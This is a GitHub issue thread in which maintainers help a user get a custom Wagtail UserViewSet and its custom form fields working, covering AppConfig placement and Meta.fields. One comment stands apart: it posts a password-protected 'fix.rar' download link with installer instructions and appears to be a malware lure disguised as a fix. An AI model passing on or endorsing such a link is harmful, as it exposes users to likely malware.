### ISSUE TITLE
Wagtail 6.2.1 custom UserViewSet not working

### ISSUE THREAD

**Issue by mjmare** [wagtail/wagtail#12256]
### Issue Summary

I've tried to apply the steps outlined on https://docs.wagtail.org/en/stable/advanced_topics/customisation/custom_user_models.html

### Steps to Reproduce

I have a custom user, which I have verified works: I can log in/log out and manipulate the user in the Django Admin. For testing purposes it defines only 1 extra field country. 

```
from django_use_email_as_username.models import BaseUser, BaseUserManager
from django.db import models

class CustomUser(BaseUser):
    objects = BaseUserManager()

    country = models.CharField(verbose_name='country', max_length=255)

    REQUIRED_FIELDS = ["country"]   # in addition to USERNAME_FIELD
```
This is the source layout:

<img width="247" alt="Screenshot 2024-08-26 at 21 47 07" src="https://github.com/user-attachments/assets/9ad31b0b-1b60-41b4-8979-e50bc3126f0e">

Now I want to have it work in WT. Whatever I do, Settings>Users just shows the default edit/create forms.

I have this Appconfig, which I have verified in the debugger IS called. 
```
class CustomauthConfig(AppConfig):
    name = 'customauth'
    label = 'customauth'
    verbose_name = 'CustomUser Management'
    user_viewset = "customauth.viewsets.CustomUserViewSet"
    group_viewset = "wagtail.users.views.groups.GroupViewSet"
```

I have this custom UserViewset:
```
from wagtail.users.views.users import UserViewSet as WagtailUserViewSet
from .forms import CustomUserCreationForm, CustomUserEditForm

class CustomUserViewSet(WagtailUserViewSet):

    def get_form_class(self, for_update=False):
        if for_update:
            return CustomUserEditForm
        return CustomUserCreationForm
```

I have checked in the debugger, and it is NOT called, neither on creation, neither is the `get_form_class` method called.  (Its ancestor UserViewSet IS called).

So my guess is that for some the registration fails. Is a doc step missing? Or am I messing up some path?

Any help appreciated.

Marcel

PS the docs:
```
# myproject/apps.py
from wagtail.users.apps import WagtailUsersAppConfig


class CustomUsersAppConfig(WagtailUsersAppConfig):
    user_viewset = "myapp.viewsets.UserViewSet"
```
are incomplete. name *and* label should be overridden as well.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by gasman** [comment]
Just tried the instructions in the docs starting from a new Wagtail 6.2.1 installation (but leaving out the 'status' field), and all worked fine for me. I suspect you left the `"wagtail.users"` line in place in INSTALLED_APPS, rather than replacing it with `"myproject.apps.CustomUsersAppConfig"` as instructed.

**Comment by mjmare** [comment]
Actually I have `customauth.apps.CustomauthConfig` in INSTALLED_APPS. But indeed I also have `wagtail.users` as well (before customauth.apps.CustomauthConfig).
However, when removing wagtail.users, the Settings>Users menu disappears.

**Comment by laymonage** [comment]
@mjmare I can't replicate it with a fresh Wagtail project and a similar custom viewset – the Settings > Users menu still appears as normal. The built-in `UserViewSet` has `add_to_settings_menu` set to `True`: https://github.com/wagtail/wagtail/blob/37bc8c8cb771b3cdfd35c606beac3a89b1e30956/wagtail/users/views/users.py#L385-L394

Unless it (or the other related properties/methods e.g. `menu_hook`, `on_register()`, `register_menu_item()`) is overridden, I can't think of anything else that could cause the menu to disappear.

Do the custom forms render as expected?

**Comment by mjmare** [comment]
I think I found the problem. I missed that the 
```
class CustomUsersAppConfig(WagtailUsersAppConfig):
    user_viewset = "wtuser.viewsets.UserViewSet"
```
should be in the PROJECT not the custom user APP.  All other files should be in the APP. Easy to miss (for me). 
If you put CustomUsersAppConfig in the APP it seems to work, but will get you tons of smaller and larger problems. 

So now only 1 problem remains: although the new country field is shown and can be filled, it is not stored in the database (the field IS in the database table). If the user is created/edited in the Django Admin everything is fine.

**Comment by mjmare** [comment]
I tried adding an objectmanager to the CustomUser, but that does not help. The new Country field is now correctly shown in the WT UI, but is has no effect: the field is read from nor written to the database.

**Comment by laymonage** [comment]
Thanks @mjmare! Sorry for the confusion about where to place the `apps.py` – I did update the docs in #12182 to mitigate this (as I encountered it myself), but I completely forgot to update the deprecation/migration guide in the release notes as well 🤦


I also noticed the same thing about the empty form field – sorry, should've checked that the field actually works (and not just renders) before responding to you. Again, this looks like a documentation issue.

I seem to have misunderstood Django's docs in my comment https://github.com/wagtail/wagtail/pull/11952#discussion_r1598646882.

In https://docs.djangoproject.com/en/stable/topics/forms/modelforms/#overriding-the-default-fields, Django says:

> `ModelForm` is a regular `Form` which can automatically generate certain fields. The fields that are automatically generated depend on the content of the `Meta` class and on which fields have already been defined declaratively. Basically, `ModelForm` will only generate fields that are missing from the form, or in other words, fields that weren’t defined declaratively.
> Fields defined declaratively are left as-is, therefore any customizations made to `Meta` attributes such as `widgets`, `labels`, `help_texts`, or `error_messages` are ignored; these only apply to fields that are generated automatically.

However, it doesn't mention the fact that you actually _do_ need to specify the field in `Meta.fields` even if you have explicitly declared the field. Otherwise, **the field is treated as a non-model field** – so a plain form field is rendered.

I guess this is implied by the fact that the `slug` field is still included in `Meta.fields` in the example despite the explicit declaration of the field, which I failed to notice.

Looking back, this makes sense as this allows you to have non-model form fields with the same name as a model field, e.g. if you want to have a custom handling for that specific field instead of going through `ModelForm`'s mechanism.

Now I understand why `WAGTAIL_USER_CUSTOM_FIELDS` was necessary even if you have explicitly declared the form fields.

I'll update the docs to fix this.

In the meantime, could you confirm if adding the fields to your form classes' `Meta` class works for you? For example:

```py
class CustomUserEditForm(UserEditForm):
    country = forms.CharField(...)

	# This is required!
    # Extend from UserEditForm.Meta and union its fields set with any custom model fields
    # you want to include.
    class Meta(UserEditForm.Meta):
        fields = UserEditForm.Meta.fields | {"country"}


class CustomUserCreateForm(UserCreateForm):
    country = forms.CharField(...)

	# Just like UserEditForm.Meta, but with UserCreateForm.Meta
    class Meta(UserCreateForm.Meta):
        fields = UserCreateForm.Meta.fields | {"country"}
```

**Comment by laymonage** [comment]
@mjmare You _can_ put it in the same `apps.py` as the app where you have your user model, but you'll need to make sure to use two separate `AppConfig`s for the two, and make sure to register both apps.

_Don't_ turn your existing app's `AppConfig` into a `WagtailUsersAppConfig` subclass, otherwise Django will think your custom user model is part of `wagtail.users`.

Even after creating a separate config class for both apps, you need to make sure to use the dotted path to the config classes instead of the app's directory name in `INSTALLED_APPS`. For example, instead of:

```py
INSTALLED_APPS = [
    ...
    "customauth",
    "customauth.apps.CustomWagtailUsersAppConfig",
    ...
```

do

```py
INSTALLED_APPS = [
    ...
    "customauth.apps.CustomauthConfig",
    "customauth.apps.CustomWagtailUsersAppConfig",
    ...
```

If you want to use `"customauth"`, you need to set `default = True` in your `CustomauthConfig` so Django knows to use it. Otherwise, Django will use a base `AppConfig` class (which does not have `default_auto_field` and will raise a `models.W042` warning).

Having to explain and understand the above is a bit more involved compared to "just put your custom config in an `apps.py` inside the project's directory", where we can be sure it's not actually used by a real app. Besides, we already supported a custom `GroupViewSet` which used the same `myproject/apps.py` pattern since a long time ago – reusing the same pattern allows us to say "just add `user_viewset` attribute in addition to `group_viewset` if you already have a custom `GroupViewSet`".

---

> I can confirm that it works now. Will this be the recommended/documented way of doing things or will you implement something else?

Yes, I don't think we want to reinstate `WAGTAIL_USER_CUSTOM_FIELDS`. Or the alternative would be making Wagtail automatically pick up any fields explicitly declared on the form that have the same name as a model field, but that's against Django's behaviour and would prevent you from having a form field with a completely custom handling.

I'll just update the documentation – no changes to Wagtail itself is needed 🙂

**Comment by mjmare** [comment]
@laymonage 

> Don't turn your existing app's AppConfig into a WagtailUsersAppConfig subclass, otherwise Django will think your custom user model is part of wagtail.users.

Yes, I found that out the hard way ;-)



I can confirm that multiple app registrations like the following, works:
```
from django.apps import AppConfig
from wagtail.users.apps import WagtailUsersAppConfig

# wtuser/app.py

class WtuserConfig(AppConfig):
    default = True
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'wtuser'
    label = 'wtuser'


class WagtailCustomUsersAppConfig(WagtailUsersAppConfig):
    user_viewset = "wtuser.viewsets.UserViewSet"
```

In settings.py one can use either:
```
    'wtuser',
    'wtuser.apps.WagtailCustomUsersAppConfig',
```
or: 
```
    'wtuser.apps.WtuserConfig',
    'wtuser.apps.WagtailCustomUsersAppConfig',
```
Great!

Thanks again for your kind helpful comments and solutions.

Marcel
